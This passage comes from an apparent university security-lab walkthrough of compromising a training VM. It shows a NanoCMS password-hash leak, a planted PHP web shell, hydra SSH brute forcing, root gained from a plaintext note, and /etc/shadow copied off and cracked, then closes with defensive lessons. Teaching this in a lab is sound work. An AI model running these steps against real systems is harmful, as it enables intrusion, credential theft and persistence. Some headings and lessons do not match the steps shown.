the website it's fairly easy to determine what sort of software is 
powering it by looking at the lower left hand corner of the page:</p>

<p dir="auto">powered by NanoCMS</p>

<p dir="auto">You'll also notice that this page has links to other web 
application software installed on the web server, specifically the 
'Webmail' link points to an installation of SquirrelMail (<a href="http://www.squirrelmail.org/" rel="nofollow noreferrer noopener" target="_blank">http://www.squirrelmail.org</a>).</p>

<h1 dir="auto">
<a id="user-content-step-5-exploiting-vulnerable-software" class="anchor" href="#step-5-exploiting-vulnerable-software" aria-hidden="true"></a>Step 5 – Exploiting Vulnerable Software</h1>

<p dir="auto">Find vulnerabilities in the installed web applications that you can use to take over the web server.</p>

<h2 dir="auto">
<a id="user-content-discovering-version-information" class="anchor" href="#discovering-version-information" aria-hidden="true"></a>Discovering Version Information</h2>

<p dir="auto">Many times open source software is distributed as part of a
 packaged zip file. Usually when this zip file is inflated there are 
text files that detail the instructions for installing the software, 
information about the latest version, and other useful tidbits. These 
files usually follow a standard naming convention and can reveal the 
version of the software that is installed. Try the following URL's and 
see if any of the open source software that we've found installed 
reveals any version information. Note that you'll need to change the IP 
at the beginning of the URL to get results:</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">http://&lt;Your IP here&gt;/~andy/README.txt</span>
<span id="LC2" class="line" lang="plaintext">http://&lt;Your IP here&gt;/~andy/INSTALL.txt</span>
<span id="LC3" class="line" lang="plaintext">http://&lt;Your IP here&gt;/~andy/CHANGELOG.txt</span>
<span id="LC4" class="line" lang="plaintext">http://&lt;Your IP here&gt;/events/README.txt</span>
<span id="LC5" class="line" lang="plaintext">http://&lt;Your IP here&gt;/events/INSTALL.txt</span>
<span id="LC6" class="line" lang="plaintext">http://&lt;Your IP here&gt;/events/CHANGELOG.txt</span>
<span id="LC7" class="line" lang="plaintext">http://&lt;Your IP here&gt;/mail/README.txt</span>
<span id="LC8" class="line" lang="plaintext">http://&lt;Your IP here&gt;/mail/INSTALL.txt</span>
<span id="LC9" class="line" lang="plaintext">http://&lt;Your IP here&gt;/mail/CHANGELOG.txt</span></code></pre>
<p dir="auto">You'll note that some software gives away version 
information quite readily. Other software, however, protects version 
information more carefully.</p>

<p dir="auto">In the case of all the open source packages we've found, 
however, there is a chance that they might contain known 
vulnerabilities. We might get lucky and find that an older version of 
the software is installed that has known vulnerabilities, or we might 
even find software that has known vulnerabilities for which there is no 
fix available (known as 0-day (“zero day” or “oh day”) vulnerabilities).</p>

<p dir="auto">Try a web search for “[software name] vulnerability” and 
see if you get any results. Note that so far we've observed NanoCMS, 
Drupal, phpMyAdmin, and SquirrelMail installed on the target. Any of 
these software packages might contain significant security 
vulnerabilities.</p>

<h2 dir="auto">
<a id="user-content-finding-known-vulnerabilities" class="anchor" href="#finding-known-vulnerabilities" aria-hidden="true"></a>Finding Known Vulnerabilities</h2>

<p dir="auto">After looking at all three software packages known 
vulnerabilities you'll see that they all have security flaws that have 
been publicly disclosed. However, you'll see that NanoCMS has 
vulnerabilities in version 0.4 that have not been fixed – 0-days!</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/3f1980600b5c690eacd8d090efce7d54/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/3f1980600b5c690eacd8d090efce7d54/image.png"></a></p>

<p dir="auto">NanoCMS has a known flaw where you can call a specific URL
 and reveal the version of NanoCMS installed as well as the MD5 hash of 
the administrative password.</p>

<p dir="auto">Let's take a look at that URL, which is in the form:</p>

<p dir="auto"><code>http://&lt;Your IP here&gt;/~andy/data/pagesdata.txt</code></p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/85d2923644be15c74b3573c0659ab0f0/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/85d2923644be15c74b3573c0659ab0f0/image.png"></a></p>

<p dir="auto">You'll see at the very end of the long text string presented by this page there is an entry that reads:</p>

<p dir="auto">These are PHP serialized variables. The part in the quotes
 is the variable name, the “s:” then the number indicates the variable 
value size, and then, finally, in quotes is the variable value itself. 
Each of these variables is delimited by a semicolon. So analyzing the 
above we find that NanoCMS is using the variables:</p>

<p dir="auto">The password value is pretty obviously an MD5 hash, so let's see if we can look it up in our rainbow table!</p>

<p dir="auto">s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c
91fd27e52fd";s:7:"version";s:4:"v_4f";
username = admin
passsword =  9d2f75377ac0ab991d40c91fd27e52fd
version = v_4f</p>

<h2 dir="auto">
<a id="user-content-using-our-md5-rainbow-table" class="anchor" href="#using-our-md5-rainbow-table" aria-hidden="true"></a>Using our MD5 Rainbow Table</h2>

<p dir="auto">Log into the MySQL database and perform the following query:</p>

<p dir="auto"><code>root@kali:~# mysql -u root rainbow</code></p>

<p dir="auto"><code>MariaDB [rainbow]&gt; select * from hash where hash_hash = '
9d2f75377ac0ab991d40c91fd27e52fd';</code></p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/4ed37828c587bdc3c1a4dea21e077b2b/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/4ed37828c587bdc3c1a4dea21e077b2b/image.png"></a></p>

<p dir="auto">You'll see that the query quickly revealed the administrative password to the NanoCMS!</p>

<p dir="auto">So now we know that the user “andy” has set the NanoCMS 
password to “shannon”. It is highly likely that the user has utilized 
the same password for both his CMS and his login. Let's see if we can 
SSH to the target machine and gain access using these credentials.</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/c0fa25c75a51075fd0f9a936b66dedc8/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/c0fa25c75a51075fd0f9a936b66dedc8/image.png"></a></p>

<p dir="auto">Unfortunately you'll see that the password doesn't seem to
 get us access to andy's shell account (if one exists) so let's keep 
looking.</p>

<p dir="auto">Reading through some of the other vulnerabilities in 
NanoCMS we see that NanoCMS allows users to write PHP into the content 
of any page we create in a NanoCMS! Let's log into NanoCMS using the 
discovered username and password (admin/shannon) and create a new page 
that will execute arbitrary code for us!</p>

<h2 dir="auto">
<a id="user-content-creating-a-backdoor-using-nanocms" class="anchor" href="#creating-a-backdoor-using-nanocms" aria-hidden="true"></a>Creating a Backdoor Using NanoCMS</h2>

<p dir="auto">Because NanoCMS allows the administrative user to embed 
PHP in any content page we can easily create a custom page to execute 
commands for us as the Apache web server. Adding this “back door” using 
PHP is relatively straightforward once we can find an injection point 
that allows us to craft custom PHP code. Luckily NanoCMS makes this 
prcess extremely easy.</p>

<p dir="auto">After logging into NanoCMS click the “New Page” link at 
the top. Create a new page with an arbitrary title. For the page content
 enter:</p>

<p dir="auto"><code>&lt;?php system($_GET['cmd']);?&gt;</code></p>

<p dir="auto">and click the 'Add Page' button.</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/a70b1b00a81d0c40bbfc8ce96f0601e0/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/a70b1b00a81d0c40bbfc8ce96f0601e0/image.png"></a></p>

<p dir="auto">NanoCMS allows users to execute PHP from their page. What 
we've done is to create a blank page that will take the value from a URL
 variable called 'cmd' and execute it on the shell, with the privileges 
of the web server, and echo the command results back to the screen.</p>

<p dir="auto">Once the page is saved navigate back to the NanoCMS front 
page by clicking the 'View Site' link in the upper left. Click the name 
for your new page, and you should get a blank page:</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/340fb7b4a6954fdc7de8f797571ebf30/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/340fb7b4a6954fdc7de8f797571ebf30/image.png"></a></p>

<p dir="auto">Next, let's try and issue some commands. By manipulating 
the URL and appending a new GET variable to the URL string we can append
 extra data that will be processed by PHP. In the case of our backdoor 
we're using the URL variable “cmd” to tie strings we supply to the 
system() function in PHP that executes that string in a shell.</p>

<p dir="auto">Try appending the following string to the URL:</p>

<p dir="auto"><code>&amp;cmd=pwd</code></p>

<p dir="auto">This should issue the 'pwd' or “print working directory” command and echo the results onto the screen.</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/b7cbdffd084d439d609bc57b0738f40a/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/b7cbdffd084d439d609bc57b0738f40a/image.png"></a></p>

<p dir="auto">Try out a few other commands and observe the output of each:</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">&amp;cmd=whoami</span>
<span id="LC2" class="line" lang="plaintext">&amp;cmd=cat /etc/redhat-release</span>
<span id="LC3" class="line" lang="plaintext">&amp;cmd=ls -lah /var/www/html</span>
<span id="LC4" class="line" lang="plaintext">&amp;cmd=cat /etc/passwd</span></code></pre>
<p dir="auto">Now that we can issue commands, let's start putting this to our advantage and elevate our exploit.</p>

<h1 dir="auto">
<a id="user-content-step-6-leverage-exploits-to-create-a-shell-account" class="anchor" href="#step-6-leverage-exploits-to-create-a-shell-account" aria-hidden="true"></a>Step 6 – Leverage exploits to create a shell account</h1>

<p dir="auto">Use the vulnerabilities you've discovered to craft an exploit that will create a shell account.</p>

<h2 dir="auto">
<a id="user-content-exploiting-drupal" class="anchor" href="#exploiting-drupal" aria-hidden="true"></a>Exploiting Drupal</h2>

<p dir="auto">We begin by finding a list of all of the users on this 
machine by printing the /home/ directory which has a folder for each 
user via the backdoor we created.</p>

<p dir="auto"><code>http://&lt;Your IP here&gt;/~andy/index.php?page=hacked&amp;cmd=ls /home/</code></p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/faff0ecb139de123e17a4c3ab5601646/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/faff0ecb139de123e17a4c3ab5601646/image.png"></a></p>

<p dir="auto">This will give us a list of users who we can get into the 
server with. Once we have this list we can choose any of the users and 
run hydra and crack the password for them. We will use the same 
medium-text passwords file we have on the system.</p>

<p dir="auto"><code>root@kali:~# hydra -s 22 -V -l amy -P /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 10 &lt;Your IP here&gt; ssh</code></p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/04902a526f9c079d57cdcbbb264a1c53/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/04902a526f9c079d57cdcbbb264a1c53/image.png"></a></p>

<p dir="auto">As we can see here the username is amy and the password is dolphins.</p>

<p dir="auto">Now we have a local account!</p>

<p dir="auto">Once we have the password we will go to our terminal and ssh in by using the command <code>root@kali:~# ssh amy@&lt;Your IP here&gt;</code></p>

<h1 dir="auto">
<a id="user-content-step-7-access-the-root-account" class="anchor" href="#step-7-access-the-root-account" aria-hidden="true"></a>Step 7 – Access the Root Account</h1>

<p dir="auto">Once you have a local account it's time to elevate privileges to gain access to the root account.</p>

<h2 dir="auto">
<a id="user-content-discover-the-root-password" class="anchor" href="#discover-the-root-password" aria-hidden="true"></a>Discover the Root Password</h2>

<p dir="auto">Now that we have a local system account we have much 
greater freedom to navigate the system than we did using our web based 
backdoor. Let's start by looking around at the other user accounts on 
the system. To do this list the contents of the “home” directory:
This is definitely intersting. Let's see if we can view the contents of 
another users' home directory. Try patrick using:</p>

<p dir="auto">[amy@localhost ~]$ ls -lah /home/patrick</p>

<p dir="auto">You'll note a quite a volume of content in this directory.
 In fact, it looks as though the user “patrick” logs into the system and
 uses Gnome, a graphical user desktop. One interesting find is the 
.tomboy directory. Tomboy is a note taking applet that allows users to 
take quick notes on their desktop. List the contents of the .tomboy 
directory using:</p>

<p dir="auto">[amy@localhost ~]$ ls -lah /home/patrick/.tomboy</p>

<p dir="auto">Wow, we can actually read all of patrick's notes. This is a
 grave oversight in the system's user level security. Let's go ahead and
 read all of patrick's notes, starting with the last one:</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">[amy@localhost ~]$ ls /home</span>
<span id="LC2" class="line" lang="plaintext">amy  andy  jennifer  loren  amy  patrick</span></code></pre>
<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">[amy@localhost ~]$ cat /home/patrick/.tomboy/e27458de-e09d-4b56-</span>
<span id="LC2" class="line" lang="plaintext">a7c9-9599b0dd4140.note</span>
<span id="LC3" class="line" lang="plaintext">&lt;?xml version="1.0" encoding="utf-8"?&gt;</span>
<span id="LC4" class="line" lang="plaintext">&lt;note version="0.2"</span>
<span id="LC5" class="line" lang="plaintext">xmlns:link="http://beatniksoftware.com/tomboy/link"</span>
<span id="LC6" class="line" lang="plaintext">xmlns:size="http://beatniksoftware.com/tomboy/size"</span>
<span id="LC7" class="line" lang="plaintext">xmlns="http://beatniksoftware.com/tomboy"&gt;</span>
<span id="LC8" class="line" lang="plaintext">  &lt;title&gt;Root password&lt;/title&gt;</span>
<span id="LC9" class="line" lang="plaintext">  &lt;text xml:space="preserve"&gt;&lt;note-content version="0.1"&gt;Root</span>
<span id="LC10" class="line" lang="plaintext">password</span>
<span id="LC11" class="line" lang="plaintext">50$cent&lt;/note-content&gt;&lt;/text&gt;</span>
<span id="LC12" class="line" lang="plaintext">  &lt;last-change-date&gt;2009-04-30T04:38:29.0931030-04:00&lt;/last-change-</span>
<span id="LC13" class="line" lang="plaintext">date&gt;</span>
<span id="LC14" class="line" lang="plaintext">  &lt;create-date&gt;2009-04-30T04:38:16.1075330-04:00&lt;/create-date&gt;</span>
<span id="LC15" class="line" lang="plaintext">  &lt;cursor-position&gt;15&lt;/cursor-position&gt;</span>
<span id="LC16" class="line" lang="plaintext">  &lt;width&gt;450&lt;/width&gt;</span>
<span id="LC17" class="line" lang="plaintext">  &lt;height&gt;360&lt;/height&gt;</span>
<span id="LC18" class="line" lang="plaintext">  &lt;x&gt;0&lt;/x&gt;</span>
<span id="LC19" class="line" lang="plaintext">  &lt;y&gt;0&lt;/y&gt;</span>
<span id="LC20" class="line" lang="plaintext">   &lt;open-on-startup&gt;False&lt;/open-on-startup&gt;</span>
<span id="LC21" class="line" lang="plaintext">&lt;/note&gt;</span></code></pre>
<p dir="auto">Whoops! Patrick is actually the system administrator of 
this machine and it seems he has a sticky note with the root password in
 it! Let's go ahead and try out this password and see if it works:</p>

<p dir="auto">Yes, it looks like Patrick stored the root password in a sticky note on his desktop!</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">[amy@localhost ~]$ su</span>
<span id="LC2" class="line" lang="plaintext">Password:</span>
<span id="LC3" class="line" lang="plaintext">[root@localhost amy]#</span></code></pre>
<h1 dir="auto">
<a id="user-content-step-8-steal-the-shadow-file-and-crack-it" class="anchor" href="#step-8-steal-the-shadow-file-and-crack-it" aria-hidden="true"></a>Step 8 – Steal the Shadow File and Crack It</h1>

<p dir="auto">Once you get root, however, your work is not complete. If 
your intrusion is discovered, admins could easily change the root 
account and lock you back out of the machine. Cracking the passwords to 
the other user accounts will allow you access to the machine via 
numerous avenues so you can maintain control more easily. Once you have 
access to the root account you can steal the shadowed password file and 
crack the passwords for regular user accounts.</p>

<h2 dir="auto">
<a id="user-content-password-cracking" class="anchor" href="#password-cracking" aria-hidden="true"></a>Password Cracking</h2>

<p dir="auto">Linux stores system account passwords in much the same way
 as web applications that we've discussed previously. Instead of storing
 the actual passwords, Linux systems store the password hashes. Linux 
has a few notable security improvements over regular password hashes, 
however. Firstly, the system passwords are stored in a file that only 
root can read. This file is /etc/shadow and it is of tremendous value to
 any system cracker. The second security enhancement is the fact that 
Linux salts passwords.</p>

<p dir="auto">Salting a password is simply the process of taking an 
extra bit of random data and adding it to the original, user supplied, 
password before storing the hash. This salt is then stored with the 
“salted” hash so that when the user re-enters their password the salt 
can be appended, the hash calculated, and then compared with the stored 
value. There is a twofold benefit in the use of salts. The first is that
 the password complexity is increased by the addition of the salt. The 
second advantage is that an attacker does not know the salt, and cannot 
know it as it is randomly generated. This prevents attackers from 
pre-generating a rainbow table to crack the salted password hashes.</p>

<p dir="auto">Because of these factors we have to crack the shadow 
password file using brute force guessing techniques. This is a resource 
intensive operation so is best performed “offline” by copying the shadow
 file onto another machine we control. Once this is done we can attempt 
to crack the passwords using our own resources (so nobody will be 
alerted to our activities by spiking CPU load) and removes network 
overhead.</p>

<p dir="auto">Now that we have the root password let's see if we can 
copy the password shadow file and crack it locally. We're still logged 
into our backdoor user account on the target, and we've become the root 
user:</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">[root@localhost amy]# cp /etc/shadow .</span>
<span id="LC2" class="line" lang="plaintext">[root@localhost amy]# chown amy shadow</span>
<span id="LC3" class="line" lang="plaintext">[root@localhost amy]# exit</span>
<span id="LC4" class="line" lang="plaintext">exit</span>
<span id="LC5" class="line" lang="plaintext">[amy@localhost ~]$ logout</span>
<span id="LC6" class="line" lang="plaintext">root@kali:~# </span></code></pre>
<p dir="auto">Once we have a copy of the shadow file in our backdoor 
user's home directory let's copy it back to our local machine. From the 
attack image issue the following commands:</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">root@kali:~# sftp amy@192.168.57.3</span>
<span id="LC2" class="line" lang="plaintext">amy@192.168.57.3's password: </span>
<span id="LC3" class="line" lang="plaintext">Connected to 192.168.57.3.</span>
<span id="LC4" class="line" lang="plaintext">sftp&gt; get shadow </span>
<span id="LC5" class="line" lang="plaintext">Fetching /home/amy/shadow to shadow</span>
<span id="LC6" class="line" lang="plaintext">/home/amy/shadow                              100% 1405     1.5MB/s   00:00    </span>
<span id="LC7" class="line" lang="plaintext">sftp&gt; exit</span></code></pre>
<p dir="auto">Once we have the file it's time to start cracking it. 
Depending on the complexity of passwords chosen by users this could take
 some time. We'll use John the Ripper, which is an excellent password 
cracker. John's performance is determined in some part by the word list 
that we give it. It will, however, attempt some permutations of these 
words in order to determine if small variations in the provided wordlist
 words match a password.
Once we have the shadow file locally we can begin cracking it.</p>

<h2 dir="auto">
<a id="user-content-using-john-the-ripper" class="anchor" href="#using-john-the-ripper" aria-hidden="true"></a>Using John the Ripper</h2>

<p dir="auto">John the Ripper is an extremely versatile password 
cracking utility. John the Ripper uses brute force password cracker as 
opposed to rainbow tables that we utilized earlier. This means that John
 the Ripper guesses passwords and tests the results against a password 
file. This approach is more time consuming than utilizing rainbow 
tables, and is more resource intensive. However, brute force techniques 
can defeat salted passwords and are 100% successful given enough time 
and resources (although cracking some passwords might be so lengthy and 
expensive as to be practically impossible).</p>

<p dir="auto">For our first try let's just use the wordlist supplied with dirbuster. let's first try a simple brute force attack:</p>

<p dir="auto"><code>john --show shadow</code></p>

<p dir="auto">In the first pass John the Ripper managed to crack 4 of 
the 7 passwords in the /etc/shadow file. It looks as though the password
 for the root account and the password </p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/002b92ce7e388653f06910e9eddfd278/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/002b92ce7e388653f06910e9eddfd278/image.png"></a></p>

<p dir="auto">While we still were not able to crack loren's and the root
 user's account we have managed to recover every single user account 
password with ease! Now we have the password for each account on the 
system and even if we become locked out at a later point we will be able
 to log back in using a regular user's account.</p>

<h2 dir="auto">
<a id="user-content-lessons-learned" class="anchor" href="#lessons-learned" aria-hidden="true"></a>Lessons Learned</h2>

<p dir="auto">After completing the exercise we can review the lessons we can learn from this exercise.</p>

<h2 dir="auto">
<a id="user-content-keep-software-up-to-date" class="anchor" href="#keep-software-up-to-date" aria-hidden="true"></a>Keep Software Up to Date</h2>

<p dir="auto">Applying patches and updates is the best way to prevent 
known vulnerabilities. By subscribing to user mailing lists or security 
update lists you can keep an eye out for security developments involving
 software you utilize. You can also be alerted as soon as a newer 
version of software is released as well as any security updates the 
update addresses.</p>

<h2 dir="auto">
<a id="user-content-prevent-version-disclosure" class="anchor" href="#prevent-version-disclosure" aria-hidden="true"></a>Prevent Version Disclosure</h2>

<p dir="auto">Often times attackers will seek out version information 
from software to determine if it contains known vulnerabilities. Making 
this information difficult to retrieve compounds the effort attackers 
must spend. Of course, masking version information doesn't mitigate 
vulnerabilities in the software, it may prevent an attack by 
discouraging an attacker. Unfortunately this is not always the case. 
Knowing the version of software run on our target allowed us to craft 
our attacks, but ultimately it was software vulnerability that let us 
in. Even without knowing version information we could have carried out 
our attacks, but at least we didn't waste time trying attacks that had 
been mitigated in the versions of the software installed.</p>

<h2 dir="auto">
<a id="user-content-protect-user-space" class="anchor" href="#protect-user-space" aria-hidden="true"></a>Protect User Space</h2>

<p dir="auto">One grievous flaw in the target system was that once a 
user account was compromised there was nothing preventing the attacker 
from browsing the home directories of other users. This sort of 
configuration can crop up when administrators try to solve subtle 
permissions problems with an overly broad approach. Even if a system 
doesn't allow this configuration by default you should never assume that
 an administrator might unintentionally introduce it. Be sure that 
users' home directories are private by correctly utilizing the Linux 
permissions model.</p>

<p dir="auto">##Storing Passwords in Plain Text
Ultimately we were unable to crack the root user password. The only 
thing that led us to the root password was the fact that an 
administrator stored the password in an unencrypted file in their home 
directory. Although a more appropriate permissions model on the home 
directory might have prevented this specific compromise, the fact that 
the password was accessible makes it vulnerable. Keeping account 
passwords in plain text files in browser password stores, e-mail 
clients, text files, and other unsecured formats can lead to exposure 
and compromise.</p>

<h2 dir="auto">
<a id="user-content-use-privilege-separation" class="anchor" href="#use-privilege-separation" aria-hidden="true"></a>Use Privilege Separation</h2>

<p dir="auto">We saw how a shell script that was designed to be part of a
 web application could become vulnerable to attack by a malicious 
outsider who gained control over the Apache web server. By allowing the 
apache user write access to a script that was run by root, we 
effectively gave control of the root account to the web server process. 
Extreme care should be given to situations where one user account is 
utilized to run scripts owned by another user account. The owner of 
files can always change the permissions on those files so they can write
 to them, so merely removing write privileges from the cron-curl.sh 
script would not have prevented this attack. A safer strategy would have
 been to either run the scripts as the apache user or to have them owned
 by an entirely different user and run with that user's crontab. 
Unfortunately, regular Drupal upgrades make this strategy cumbersome. By
 mixing shell scripts into the web application directory there is an 
inherent danger that the scripts will be unsafely utilized. Rather than 
including such shell scripts in the source distribution it would be 
safer to include details of how to safely write and schedule them well 
away from the web server process (so they could not fall victim to an 
attacker who controlled the web server). Even this approach is not 100% 
foolproof however, so extreme caution should be given to any 
implementation such as Drupal scheduled cron jobs.</p>

<h2 dir="auto">
<a id="user-content-0-day-for-the-win" class="anchor" href="#0-day-for-the-win" aria-hidden="true"></a>0-day for the Win</h2>

<p dir="auto">One major flaw with the target server was the presence of a
 0-day flaw in one of the installed web applications. Although this 
application was an open source project, it could just have easily been a
 piece of commercial or custom product. 0-day exploits are extremely 
valuable to the black hat community because they allow access to 
resources that cannot be prevented. In the face of such a threat what is
 a reasonable defense? The only reliable strategy is “defense in depth.”
 You should consider what might happen if any one of your resources were
 compromised. What could you do to detect such a compromise and what 
could be done to prevent the compromise of one service leading to a 
total root compromise? In this situation, at least, the 0-day is a known
 flaw, and could be mitigated by modifying the Apache configuration to 
hide the file containing the password hash from direct browsing. 
However, this is possible due to the fact that the 0-day was discovered 
and released by a white hat security researcher. Had the vulnerability 
been discovered by the black hat community, it likely would have 
remained a valuable secret.</p>

<p dir="auto">Part of the reason this particular 0-day was so dangerous 
was because the system it is used to exploit provides direct access for a
 remote user to create PHP. Before deploying such a system it is 
critical to evaluate this functionality, determine the software's 
necessity, and measure the consequences of such a resource being 
compromised. If it was absolutely necessary for a user to create PHP via
 a web browser, is it necessary that such functionality be open to any 
IP address? Could access to the resource be limited? PHP can be 
configured to disallow certain native functions, such as the system() 
call. Is it possible to disable this functionality to deny it to an 
attacker but still allow web applications to function? What other steps 
could be taken to mitigate such a threat? Are there safer alternative 
software packages that could enable the same functionality? It is 
important to evaluate all new software before installation to calculate 
the risk factors introduced by the software.</p>

<h2 dir="auto">
<a id="user-content-other-unscripted-attack-vectors" class="anchor" href="#other-unscripted-attack-vectors" aria-hidden="true"></a>Other Unscripted Attack Vectors:</h2>

<ol dir="auto">
<li>Recover the /etc/password file using file include vulnerabilities in the main website</li>
<li>Try enumerating hidden files by checking the Webalizer statistics in a hidden web
directory.</li>
<li>Get the MySQL root password by finding files that have been edited with vi, appending
the tilde '~' to their filename</li>
<li>Log into MySQL from a local user account, view the Drupal users table, dump it and try
cracking the passwords using your MD5 rainbow tables</li>
<li>Send yourself e-mail using an e-mail header splitting attack against the contact form</li>
<li>Try a brute force password guessing attack against the target's Samba server</li>
<li>Explore user home directories using the Samba file share</li>
</ol>
</div>
</div>



</div>
</div>
</div>
</div>





</body></html>